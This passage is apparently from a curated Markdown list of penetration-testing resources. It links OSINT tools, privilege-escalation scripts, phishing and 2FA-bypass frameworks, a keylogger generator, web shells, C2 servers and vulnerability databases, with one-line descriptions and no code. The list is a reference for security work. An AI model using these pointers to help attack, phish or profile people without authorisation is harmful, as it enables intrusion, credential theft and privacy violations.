* [w3af](https://github.com/andresriancho/w3af) - Web application attack and audit framework.
## Online Resources
### Online Operating Systems Resources
* [DistroWatch.com's Security Category](https://distrowatch.com/search.php?category=Security) - Website dedicated to talking about, reviewing, and keeping up to date with open source operating systems.
### Online Penetration Testing Resources
* [MITRE's Adversarial Tactics, Techniques & Common Knowledge (ATT&CK)](https://attack.mitre.org/) - Curated knowledge base and model for cyber adversary behavior.
* [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) - Free Offensive Security Metasploit course.
* [Open Web Application Security Project (OWASP)](https://www.owasp.org/index.php/Main_Page) - Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.
* [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - Free online security knowledge library for pentesters and researchers.
* [Penetration Testing Execution Standard (PTES)](http://www.pentest-standard.org/) - Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.
* [Penetration Testing Framework (PTF)](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Outline for performing penetration tests compiled as a general framework usable by vulnerability analysts and penetration testers alike.
* [XSS-Payloads](http://www.xss-payloads.com) - Resource dedicated to all things XSS (cross-site), including payloads, tools, games, and documentation.
### Other Lists Online
* [.NET Programming](https://github.com/quozd/awesome-dotnet) - Software framework for Microsoft Windows platform development.
* [Infosec/hacking videos recorded by cooper](https://administraitor.video) - Collection of security conferences recorded by Cooper.
* [Android Exploits](https://github.com/sundaysec/Android-Exploits) - Guide on Android Exploitation and Hacks.
* [Android Security](https://github.com/ashishb/android-security-awesome) - Collection of Android security related resources.
* [AppSec](https://github.com/paragonie/awesome-appsec) - Resources for learning about application security.
* [Awesome Awesomness](https://github.com/bayandin/awesome-awesomeness) - The List of the Lists.
* [Awesome Malware](https://github.com/fabacab/awesome-malware) - Curated collection of awesome malware, botnets, and other post-exploitation tools.
* [Awesome Shodan Queries](https://github.com/jakejarvis/awesome-shodan-queries) - Awesome list of useful, funny, and depressing search queries for Shodan.
* [AWS Tool Arsenal](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) - List of tools for testing and securing AWS environments.
* [Blue Team](https://github.com/fabacab/awesome-cybersecurity-blueteam) - Awesome resources, tools, and other shiny things for cybersecurity blue teams.
* [C/C++ Programming](https://github.com/fffaraz/awesome-cpp) - One of the main language for open source security tools.
* [CTFs](https://github.com/apsdehal/awesome-ctf) - Capture The Flag frameworks, libraries, etc.
* [Forensics](https://github.com/Cugu/awesome-forensics) - Free (mostly open source) forensic analysis tools and resources.
* [Hacking](https://github.com/carpedm20/awesome-hacking) - Tutorials, tools, and resources.
* [Honeypots](https://github.com/paralax/awesome-honeypots) - Honeypots, tools, components, and more.
* [InfoSec § Hacking challenges](https://github.com/AnarchoTechNYC/meta/wiki/InfoSec#hacking-challenges) - Comprehensive directory of CTFs, wargames, hacking challenge websites, pentest practice lab exercises, and more.
* [Infosec](https://github.com/onlurking/awesome-infosec) - Information security resources for pentesting, forensics, and more.
* [JavaScript Programming](https://github.com/sorrycc/awesome-javascript) - In-browser development and scripting.
* [Kali Linux Tools](http://tools.kali.org/tools-listing) - List of tools present in Kali Linux.
* [Node.js Programming by @sindresorhus](https://github.com/sindresorhus/awesome-nodejs) - Curated list of delightful Node.js packages and resources.
* [Pentest Cheat Sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) - Awesome Pentest Cheat Sheets.
* [Python Programming by @svaksha](https://github.com/svaksha/pythonidae) - General Python programming.
* [Python Programming by @vinta](https://github.com/vinta/awesome-python) - General Python programming.
* [Python tools for penetration testers](https://github.com/dloss/python-pentest-tools) - Lots of pentesting tools are written in Python.
* [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/) - An open-source inventory of tools, resources, CTF platforms and Operating Systems about CyberSecurity. ([Source](https://gitlab.com/rawsec/rawsec-cybersecurity-list))
* [Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) - List of Awesome Red Teaming Resources.
* [Ruby Programming by @Sdogruyol](https://github.com/Sdogruyol/awesome-ruby) - The de-facto language for writing exploits.
* [Ruby Programming by @dreikanter](https://github.com/dreikanter/ruby-bookmarks) - The de-facto language for writing exploits.
* [Ruby Programming by @markets](https://github.com/markets/awesome-ruby) - The de-facto language for writing exploits.
* [SecLists](https://github.com/danielmiessler/SecLists) - Collection of multiple types of lists used during security assessments.
* [SecTools](http://sectools.org/) - Top 125 Network Security Tools.
* [Security Talks](https://github.com/PaulSec/awesome-sec-talks) - Curated list of security conferences.
* [Security](https://github.com/sbilly/awesome-security) - Software, libraries, documents, and other resources.
* [Serverless Security](https://github.com/puresec/awesome-serverless-security/) - Curated list of awesome serverless security resources such as (e)books, articles, whitepapers, blogs and research papers.
* [Shell Scripting](https://github.com/alebcay/awesome-shell) - Command line frameworks, toolkits, guides and gizmos.
* [YARA](https://github.com/InQuest/awesome-yara) - YARA rules, tools, and people.
### Penetration Testing Report Templates
* [Public Pentesting Reports](https://github.com/juliocesarfort/public-pentesting-reports) - Curated list of public penetration test reports released by several consulting firms and academic security groups.
* [T&VS Pentesting Report Template](https://www.testandverification.com/wp-content/uploads/template-penetration-testing-report-v03.pdf) - Pentest report template provided by Test and Verification Services, Ltd.
* [Web Application Security Assessment Report Template](http://lucideus.com/pdf/stw.pdf) - Sample Web application security assessment reporting template provided by Lucideus.
## Open Sources Intelligence (OSINT)
See also [awesome-osint](https://github.com/jivoi/awesome-osint).
* [DataSploit](https://github.com/upgoingstar/datasploit) - OSINT visualizer utilizing Shodan, Censys, Clearbit, EmailHunter, FullContact, and Zoomeye behind the scenes.
* [Depix](https://github.com/beurtschipper/Depix) - Tool for recovering passwords from pixelized screenshots (by de-pixelating text).
* [GyoiThon](https://github.com/gyoisamurai/GyoiThon) - GyoiThon is an Intelligence Gathering tool using Machine Learning.
* [Intrigue](http://intrigue.io) - Automated OSINT & Attack Surface discovery framework with powerful API, UI and CLI.
* [Maltego](http://www.maltego.com/) - Proprietary software for open sources intelligence and forensics.
* [PacketTotal](https://packettotal.com/) - Simple, free, high-quality packet capture file analysis facilitating the quick detection of network-borne malware (using Zeek and Suricata IDS signatures under the hood).
* [Skiptracer](https://github.com/xillwillx/skiptracer) - OSINT scraping framework that utilizes basic Python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.
* [Sn1per](https://github.com/1N3/Sn1per) - Automated Pentest Recon Scanner.
* [Spiderfoot](http://www.spiderfoot.net/) - Multi-source OSINT automation tool with a Web UI and report visualizations.
* [creepy](https://github.com/ilektrojohn/creepy) - Geolocation OSINT tool.
* [gOSINT](https://github.com/Nhoya/gOSINT) - OSINT tool with multiple modules and a telegram scraper.
* [image-match](https://github.com/ascribe/image-match) - Quickly search over billions of images.
* [recon-ng](https://github.com/lanmaster53/recon-ng) - Full-featured Web Reconnaissance framework written in Python.
* [sn0int](https://github.com/kpcyrd/sn0int) - Semi-automatic OSINT framework and package manager.
* [Facebook Friend List Scraper](https://github.com/narkopolo/fb_friend_list_scraper) - Tool to scrape names and usernames from large friend lists on Facebook, without being rate limited.
### Data Broker and Search Engine Services
* [Hunter.io](https://hunter.io/) - Data broker providing a Web search interface for discovering the email addresses and other organizational details of a company.
* [Threat Crowd](https://www.threatcrowd.org/) - Search engine for threats.
* [Virus Total](https://www.virustotal.com/) - Free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.
* [surfraw](https://github.com/kisom/surfraw) - Fast UNIX command line interface to a variety of popular WWW search engines.
### Dorking tools
* [BinGoo](https://github.com/Hood3dRob1n/BinGoo) - GNU/Linux bash based Bing and Google Dorking Tool.
* [dorkbot](https://github.com/utiso/dorkbot) - Command-line tool to scan Google (or other) search results for vulnerabilities.
* [github-dorks](https://github.com/techgaun/github-dorks) - CLI tool to scan GitHub repos/organizations for potential sensitive information leaks.
* [GooDork](https://github.com/k3170makan/GooDork) - Command line Google dorking tool.
* [Google Hacking Database](https://www.exploit-db.com/google-hacking-database/) - Database of Google dorks; can be used for recon.
* [dork-cli](https://github.com/jgor/dork-cli) - Command line Google dork tool.
* [dorks](https://github.com/USSCltd/dorks) - Google hack database automation tool.
* [fast-recon](https://github.com/DanMcInerney/fast-recon) - Perform Google dorks against a domain.
* [pagodo](https://github.com/opsdisk/pagodo) - Automate Google Hacking Database scraping.
* [snitch](https://github.com/Smaash/snitch) - Information gathering via dorks.
### Email search and analysis tools
* [SimplyEmail](https://github.com/SimplySecurity/SimplyEmail) - Email recon made fast and easy.
* [WhatBreach](https://github.com/Ekultek/WhatBreach) - Search email addresses and discover all known breaches that this email has been seen in, and download the breached database if it is publicly available.
### Metadata harvesting and analysis
* [FOCA (Fingerprinting Organizations with Collected Archives)](https://www.elevenpaths.com/labstools/foca/) - Automated document harvester that searches Google, Bing, and DuckDuckGo to find and extrapolate internal company organizational structures.
* [metagoofil](https://github.com/laramies/metagoofil) - Metadata harvester.
* [theHarvester](https://github.com/laramies/theHarvester) - E-mail, subdomain and people names harvester.
### Network device discovery tools
* [Censys](https://www.censys.io/) - Collects data on hosts and websites through daily ZMap and ZGrab scans.
* [Shodan](https://www.shodan.io/) - World's first search engine for Internet-connected devices.
* [ZoomEye](https://www.zoomeye.org/) - Search engine for cyberspace that lets the user find specific network components.
### OSINT Online Resources
* [CertGraph](https://github.com/lanrat/certgraph) - Crawls a domain's SSL/TLS certificates for its certificate alternative names.
* [GhostProject](https://ghostproject.fr/) - Searchable database of billions of cleartext passwords, partially visible for free.
* [NetBootcamp OSINT Tools](http://netbootcamp.org/osinttools/) - Collection of OSINT links and custom Web interfaces to other services.
* [OSINT Framework](http://osintframework.com/) - Collection of various OSINT tools broken out by category.
* [WiGLE.net](https://wigle.net/) - Information about wireless networks world-wide, with user-friendly desktop and web applications.
### Source code repository searching tools
See also *[Web-accessible source code ripping tools](#web-accessible-source-code-ripping-tools)*.
* [vcsmap](https://github.com/melvinsh/vcsmap) - Plugin-based tool to scan public version control systems for sensitive information.
* [Yar](https://github.com/Furduhlutur/yar) - Clone git repositories to search through the whole commit history in order of commit time for secrets, tokens, or passwords.
### Web application and resource analysis tools
* [BlindElephant](http://blindelephant.sourceforge.net/) - Web application fingerprinter.
* [EyeWitness](https://github.com/ChrisTruncer/EyeWitness) - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
* [VHostScan](https://github.com/codingo/VHostScan) - Virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
* [Wappalyzer](https://www.wappalyzer.com/) - Wappalyzer uncovers the technologies used on websites.
* [WhatWaf](https://github.com/Ekultek/WhatWaf) - Detect and bypass web application firewalls and protection systems.
* [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Website fingerprinter.
* [wafw00f](https://github.com/EnableSecurity/wafw00f) - Identifies and fingerprints Web Application Firewall (WAF) products.
* [webscreenshot](https://github.com/maaaaz/webscreenshot) - Simple script to take screenshots of websites from a list of sites.
## Operating System Distributions
* [Android Tamer](https://androidtamer.com/) - Distribution built for Android security professionals that includes tools required for Android security testing.
* [ArchStrike](https://archstrike.org/) - Arch GNU/Linux repository for security professionals and enthusiasts.
* [AttifyOS](https://github.com/adi0x90/attifyos) - GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.
* [BlackArch](https://www.blackarch.org/) - Arch GNU/Linux-based distribution for penetration testers and security researchers.
* [Buscador](https://inteltechniques.com/buscador/) - GNU/Linux virtual machine that is pre-configured for online investigators.
* [Kali](https://www.kali.org/) - Rolling Debian-based GNU/Linux distribution designed for penetration testing and digital forensics.
* [Network Security Toolkit (NST)](http://networksecuritytoolkit.org/) - Fedora-based GNU/Linux bootable live Operating System designed to provide easy access to best-of-breed open source network security applications.
* [Parrot](https://parrotlinux.org/) - Distribution similar to Kali, with support for multiple hardware architectures.
* [PentestBox](https://pentestbox.org/) - Open source pre-configured portable penetration testing environment for the Windows Operating System.
* [The Pentesters Framework](https://github.com/trustedsec/ptf) - Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that omits less frequently used utilities.
## Periodicals
* [2600: The Hacker Quarterly](https://www.2600.com/Magazine/DigitalEditions) - American publication about technology and computer "underground" culture.
* [Phrack Magazine](http://www.phrack.org/) - By far the longest running hacker zine.
## Physical Access Tools
* [AT Commands](https://atcommands.org/) - Use AT commands over an Android device's USB port to rewrite device firmware, bypass security mechanisms, exfiltrate sensitive information, perform screen unlocks, and inject touch events.
* [Bash Bunny](https://www.hak5.org/gear/bash-bunny) - Local exploit delivery tool in the form of a USB thumbdrive in which you write payloads in a DSL called BunnyScript.
* [LAN Turtle](https://lanturtle.com/) - Covert "USB Ethernet Adapter" that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network.
* [PCILeech](https://github.com/ufrisk/pcileech) - Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe.
* [Packet Squirrel](https://www.hak5.org/gear/packet-squirrel) - Ethernet multi-tool designed to enable covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.
* [Poisontap](https://samy.pl/poisontap/) - Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers.
* [Proxmark3](https://proxmark3.com/) - RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more.
* [Thunderclap](https://thunderclap.io/) - Open source I/O security research platform for auditing physical DMA-enabled hardware peripheral ports.
* [USB Rubber Ducky](http://usbrubberducky.com/) - Customizable keystroke injection attack platform masquerading as a USB thumbdrive.
## Privilege Escalation Tools
* [Active Directory and Privilege Escalation (ADAPE)](https://github.com/hausec/ADAPE-Script) - Umbrella script that automates numerous useful PowerShell modules to discover security misconfigurations and attempt privilege escalation against Active Directory.
* [GTFOBins](https://gtfobins.github.io/) - Curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
* [LOLBAS (Living Off The Land Binaries and Scripts)](https://lolbas-project.github.io/) - Documents binaries, scripts, and libraries that can be used for "Living Off The Land" techniques, i.e., binaries that can be used by an attacker to perform actions beyond their original purpose.
* [LinEnum](https://github.com/rebootuser/LinEnum) - Scripted local Linux enumeration and privilege escalation checker useful for auditing a host and during CTF gaming.
* [Postenum](https://github.com/mbahadou/postenum) - Shell script used for enumerating possible privilege escalation opportunities on a local GNU/Linux system.
* [unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) - Shell script to check for simple privilege escalation vectors on UNIX systems.
### Password Spraying Tools
* [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) - Tool written in PowerShell to perform a password spray attack against users of a domain.
* [SprayingToolkit](https://github.com/byt3bl33d3r/SprayingToolkit) - Scripts to make password spraying attacks against Lync/S4B, Outlook Web Access (OWA) and Office 365 (O365) a lot quicker, less painful and more efficient.
## Reverse Engineering
See also [awesome-reversing](https://github.com/tylerha97/awesome-reversing), [*Exploit Development Tools*](#exploit-development-tools).
### Reverse Engineering Books
* [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](http://www.amazon.com/Hacking-Ethical-Hackers-Handbook-Edition/dp/0071832386)
* [Hacking the Xbox by Andrew Huang, 2003](https://nostarch.com/xbox.htm)
* [Practical Reverse Engineering by Bruce Dang et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118787315.html)
* [Reverse Engineering for Beginners by Dennis Yurichev](http://beginners.re/)
* [The IDA Pro Book by Chris Eagle, 2011](https://nostarch.com/idapro2.htm)
### Reverse Engineering Tools
* [angr](https://angr.io/) - Platform-agnostic binary analysis framework.
* [Capstone](http://www.capstone-engine.org/) - Lightweight multi-platform, multi-architecture disassembly framework.
* [Detect It Easy(DiE)](https://github.com/horsicq/Detect-It-Easy) - Program for determining types of files for Windows, Linux and MacOS.
* [Evan's Debugger](http://www.codef00.com/projects#debugger) - OllyDbg-like debugger for GNU/Linux.
* [Frida](https://www.frida.re/) - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
* [Fridax](https://github.com/NorthwaveNL/fridax) - Read variables and intercept/hook functions in Xamarin/Mono JIT and AOT compiled iOS/Android applications.
* [Ghidra](https://www.ghidra-sre.org/) - Suite of free software reverse engineering tools developed by NSA's Research Directorate originally exposed in WikiLeaks's "Vault 7" publication and now maintained as open source software.
* [Immunity Debugger](https://immunityinc.com/products/debugger/) - Powerful way to write exploits and analyze malware.
* [Interactive Disassembler (IDA Pro)](https://www.hex-rays.com/products/ida/) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware.shtml).
* [Medusa](https://github.com/wisk/medusa) - Open source, cross-platform interactive disassembler.
* [OllyDbg](http://www.ollydbg.de/) - x86 debugger for Windows binaries that emphasizes binary code analysis.
* [PyREBox](https://github.com/Cisco-Talos/pyrebox) - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
* [Radare2](http://rada.re/r/index.html) - Open source, crossplatform reverse engineering framework.
* [UEFITool](https://github.com/LongSoft/UEFITool) - UEFI firmware image viewer and editor.
* [Voltron](https://github.com/snare/voltron) - Extensible debugger UI toolkit written in Python.
* [WDK/WinDbg](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools) - Windows Driver Kit and WinDbg.
* [binwalk](https://github.com/devttys0/binwalk) - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
* [boxxy](https://github.com/kpcyrd/boxxy-rs) - Linkable sandbox explorer.
* [dnSpy](https://github.com/0xd4d/dnSpy) - Tool to reverse engineer .NET assemblies.
* [plasma](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
* [pwndbg](https://github.com/pwndbg/pwndbg) - GDB plug-in that eases debugging with GDB, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers, and exploit developers.
* [rVMI](https://github.com/fireeye/rVMI) - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
* [x64dbg](http://x64dbg.com/) - Open source x64/x32 debugger for windows.
## Security Education Courses
* [ARIZONA CYBER WARFARE RANGE](http://azcwr.org/) - 24x7 live fire exercises for beginners through real world operations; capability for upward progression into the real world of cyber warfare.
* [Cybrary](http://cybrary.it) - Free courses in ethical hacking and advanced penetration testing. Advanced penetration testing courses are based on the book 'Penetration Testing for Highly Secured Environments'.
* [European Union Agency for Network and Information Security](https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material) - ENISA Cyber Security Training material.
* [Offensive Security Training](https://www.offensive-security.com/information-security-training/) - Training from BackTrack/Kali developers.
* [Open Security Training](http://opensecuritytraining.info/) - Training material for computer security classes.
* [Roppers Academy Training](https://www.hoppersroppers.org/training.html) - Free courses on computing and security fundamentals designed to train a beginner to crush their first CTF.
* [SANS Security Training](http://www.sans.org/) - Computer Security Training & Certification.
## Shellcoding Guides and Tutorials
* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) - Tutorials on how to develop exploits.
* [Shellcode Examples](http://shell-storm.org/shellcode/) - Shellcodes database.
* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html) - Tutorial on how to write shellcode.
* [The Shellcoder's Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
## Side-channel Tools
* [ChipWhisperer](http://chipwhisperer.com) - Complete open-source toolchain for side-channel power analysis and glitching attacks.
* [SGX-Step](https://github.com/jovanbulck/sgx-step) - Open-source framework to facilitate side-channel attack research on Intel x86 processors in general and Intel SGX (Software Guard Extensions) platforms in particular.
* [TRRespass](https://github.com/vusec/trrespass) - Many-sided rowhammer tool suite able to reverse engineer the contents of DDR3 and DDR4 memory chips protected by Target Row Refresh mitigations.
## Social Engineering
See also [awesome-social-engineering](https://github.com/v2-dev/awesome-social-engineering).
### Social Engineering Books
* [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](http://www.hachettebookgroup.com/titles/kevin-mitnick/ghost-in-the-wires/9780316134477/)
* [No Tech Hacking by Johnny Long & Jack Wiles, 2008](https://www.elsevier.com/books/no-tech-hacking/mitnick/978-1-59749-215-7)
* [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](https://www.mhprofessional.com/9780071818469-usa-social-engineering-in-it-security-tools-tactics-and-techniques-group)
* [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0471237124.html)
* [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764569597.html)
* [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118608577.html)
### Social Engineering Online Resources
* [Social Engineering Framework](http://www.social-engineer.org/framework/general-discussion/) - Information resource for social engineers.
### Social Engineering Tools
* [Beelogger](https://github.com/4w4k3/BeeLogger) - Tool for generating keylooger.
* [Catphish](https://github.com/ring0lab/catphish) - Tool for phishing and corporate espionage written in Ruby.
* [Evilginx2](https://github.com/kgretzky/evilginx2) - Standalone Machine-in-the-Middle (MitM) reverse proxy attack framework for setting up phishing pages capable of defeating most forms of 2FA security schemes.
* [FiercePhish](https://github.com/Raikia/FiercePhish) - Full-fledged phishing framework to manage all phishing engagements.
* [Gophish](https://getgophish.com) - Open-source phishing framework.
* [King Phisher](https://github.com/securestate/king-phisher) - Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.
* [Modlishka](https://github.com/drk1wi/Modlishka) - Flexible and powerful reverse proxy with real-time two-factor authentication.
* [ReelPhish](https://github.com/fireeye/ReelPhish) - Real-time two-factor phishing tool.
* [Social Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit) - Open source pentesting framework designed for social engineering featuring a number of custom attack vectors to make believable attacks quickly.
* [SocialFish](https://github.com/UndeadSec/SocialFish) - Social media phishing framework that can run on an Android phone or in a Docker container.
* [phishery](https://github.com/ryhanson/phishery) - TLS/SSL enabled Basic Auth credential harvester.
* [wifiphisher](https://github.com/sophron/wifiphisher) - Automated phishing attacks against WiFi networks.
## Static Analyzers
* [Brakeman](https://github.com/presidentbeef/brakeman) - Static analysis security vulnerability scanner for Ruby on Rails applications.
* [FindBugs](http://findbugs.sourceforge.net/) - Free software static analyzer to look for bugs in Java code.
* [Progpilot](https://github.com/designsecurity/progpilot) - Static security analysis tool for PHP code.
* [RegEx-DoS](https://github.com/jagracey/RegEx-DoS) - Analyzes source code for Regular Expressions susceptible to Denial of Service attacks.
* [bandit](https://pypi.python.org/pypi/bandit/) - Security oriented static analyser for Python code.
* [cppcheck](http://cppcheck.sourceforge.net/) - Extensible C/C++ static analyzer focused on finding bugs.
* [sobelow](https://github.com/nccgroup/sobelow) - Security-focused static analysis for the Phoenix Framework.
* [cwe_checker](https://github.com/fkie-cad/cwe_checker) - Suite of tools built atop the Binary Analysis Platform (BAP) to heuristically detect CWEs in compiled binaries and firmware.
## Steganography Tools
* [Cloakify](https://github.com/TryCatchHCF/Cloakify) - Textual steganography toolkit that converts any filetype into lists of everyday strings.
* [StegOnline](https://stegonline.georgeom.net/) - Web-based, enhanced, and open-source port of StegSolve.
* [StegCracker](https://github.com/Paradoxis/StegCracker) - Steganography brute-force utility to uncover hidden data inside files.
## Vulnerability Databases
* [Bugtraq (BID)](http://www.securityfocus.com/bid/) - Software security bug identification database compiled from submissions to the SecurityFocus mailing list and other sources, operated by Symantec, Inc.
* [CISA Known Vulnerabilities Database (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - Vulnerabilities in various systems already known to America's cyber defense agency, the Cybersecurity and Infrastructure Security Agency, to be actively exploited.
* [CXSecurity](https://cxsecurity.com/) - Archive of published CVE and Bugtraq software vulnerabilities cross-referenced with a Google dork database for discovering the listed vulnerability.
* [China National Vulnerability Database (CNNVD)](http://www.cnnvd.org.cn/) - Chinese government-run vulnerability database analoguous to the United States's CVE database hosted by Mitre Corporation.
* [Common Vulnerabilities and Exposures (CVE)](https://cve.mitre.org/) - Dictionary of common names (i.e., CVE Identifiers) for publicly known security vulnerabilities.
* [Exploit-DB](https://www.exploit-db.com/) - Non-profit project hosting exploits for software vulnerabilities, provided as a public service by Offensive Security.
* [Full-Disclosure](http://seclists.org/fulldisclosure/) - Public, vendor-neutral forum for detailed discussion of vulnerabilities, often publishes details before many other sources.
* [GitHub Advisories](https://github.com/advisories/) - Public vulnerability advisories published by or affecting codebases hosted by GitHub, including open source projects.
* [HPI-VDB](https://hpi-vdb.de/) - Aggregator of cross-referenced software vulnerabilities offering free-of-charge API access, provided by the Hasso-Plattner Institute, Potsdam.
* [Inj3ct0r](https://www.0day.today/) - Exploit marketplace and vulnerability information aggregator. ([Onion service](http://mvfjfugdwgc5uwho.onion/).)
* [Microsoft Security Advisories and Bulletins](https://docs.microsoft.com/en-us/security-updates/) - Archive and announcements of security advisories impacting Microsoft software, published by the Microsoft Security Response Center (MSRC).
* [Mozilla Foundation Security Advisories](https://www.mozilla.org/security/advisories/) - Archive of security advisories impacting Mozilla software, including the Firefox Web Browser.
* [National Vulnerability Database (NVD)](https://nvd.nist.gov/) - United States government's National Vulnerability Database provides additional meta-data (CPE, CVSS scoring) of the standard CVE List along with a fine-grained search engine.
* [Open Source Vulnerabilities (OSV)](https://osv.dev/) - Database of vulnerabilities affecting open source software, queryable by project, Git commit, or version.
* [Packet Storm](https://packetstormsecurity.com/files/) - Compendium of exploits, advisories, tools, and other security-related resources aggregated from across the industry.
* [SecuriTeam](http://www.securiteam.com/) - Independent source of software vulnerability information.
* [Snyk Vulnerability DB](https://snyk.io/vuln/) - Detailed information and remediation guidance for vulnerabilities known by Snyk.
* [US-CERT Vulnerability Notes Database](https://www.kb.cert.org/vuls/) - Summaries, technical details, remediation information, and lists of vendors affected by software vulnerabilities, aggregated by the United States Computer Emergency Response Team (US-CERT).
* [VulDB](https://vuldb.com) - Independent vulnerability database with user community, exploit details, and additional meta data (e.g. CPE, CVSS, CWE)
* [Vulnerability Lab](https://www.vulnerability-lab.com/) - Open forum for security advisories organized by category of exploit target.
* [Vulners](https://vulners.com/) - Security database of software vulnerabilities.
* [Vulmon](https://vulmon.com/) - Vulnerability search engine with vulnerability intelligence features that conducts full text searches in its database.
* [Zero Day Initiative](http://zerodayinitiative.com/advisories/published/) - Bug bounty program with publicly accessible archive of published security advisories, operated by TippingPoint.
## Web Exploitation
* [FuzzDB](https://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
* [Offensive Web Testing Framework (OWTF)](https://www.owasp.org/index.php/OWASP_OWTF) - Python-based framework for pentesting Web applications based on the OWASP Testing Guide.
* [Raccoon](https://github.com/evyatarmeged/Raccoon) - High performance offensive security tool for reconnaissance and vulnerability scanning.
* [WPSploit](https://github.com/espreto/wpsploit) - Exploit WordPress-powered websites with Metasploit.
* [autochrome](https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/march/autochrome/) - Chrome browser profile preconfigured with appropriate settings needed for web application testing.
* [badtouch](https://github.com/kpcyrd/badtouch) - Scriptable network authentication cracker.
* [gobuster](https://github.com/OJ/gobuster) - Lean multipurpose brute force search/fuzzing tool for Web (and DNS) reconnaissance.
* [sslstrip2](https://github.com/LeonardoNve/sslstrip2) - SSLStrip version to defeat HSTS.
* [sslstrip](https://www.thoughtcrime.org/software/sslstrip/) - Demonstration of the HTTPS stripping attacks.
### Intercepting Web proxies
See also *[Proxies and Machine-in-the-Middle (MITM) Tools](#proxies-and-machine-in-the-middle-mitm-tools)*.
* [Burp Suite](https://portswigger.net/burp/) - Integrated platform for performing security testing of web applications.
* [Fiddler](https://www.telerik.com/fiddler) - Free cross-platform web debugging proxy with user-friendly companion tools.
* [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org/) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
* [mitmproxy](https://mitmproxy.org/) - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
### Web file inclusion tools
* [Kadimus](https://github.com/P0cL4bs/Kadimus) - LFI scan and exploit tool.
* [LFISuite](https://github.com/D35m0nd142/LFISuite) - Automatic LFI scanner and exploiter.
* [fimap](https://github.com/kurobeats/fimap) - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
* [liffy](https://github.com/hvqzao/liffy) - LFI exploitation tool.
### Web injection tools
* [Commix](https://github.com/commixproject/commix) - Automated all-in-one operating system command injection and exploitation tool.
* [NoSQLmap](https://github.com/codingo/NoSQLMap) - Automatic NoSQL injection and database takeover tool.
* [SQLmap](http://sqlmap.org/) - Automatic SQL injection and database takeover tool.
* [tplmap](https://github.com/epinna/tplmap) - Automatic server-side template injection and Web server takeover tool.
### Web path discovery and bruteforcing tools
* [DotDotPwn](https://dotdotpwn.blogspot.com/) - Directory traversal fuzzer.
* [dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner.
* [recursebuster](https://github.com/c-sto/recursebuster) - Content discovery tool to perform directory and file bruteforcing.
### Web shells and C2 frameworks
* [Browser Exploitation Framework (BeEF)](https://github.com/beefproject/beef) - Command and control server for delivering exploits to commandeered Web browsers.
* [DAws](https://github.com/dotcppfile/DAws) - Advanced Web shell.
* [Merlin](https://github.com/Ne0nd0g/merlin) - Cross-platform post-exploitation HTTP/2 Command and Control server and agent written in Golang.
* [PhpSploit](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner.
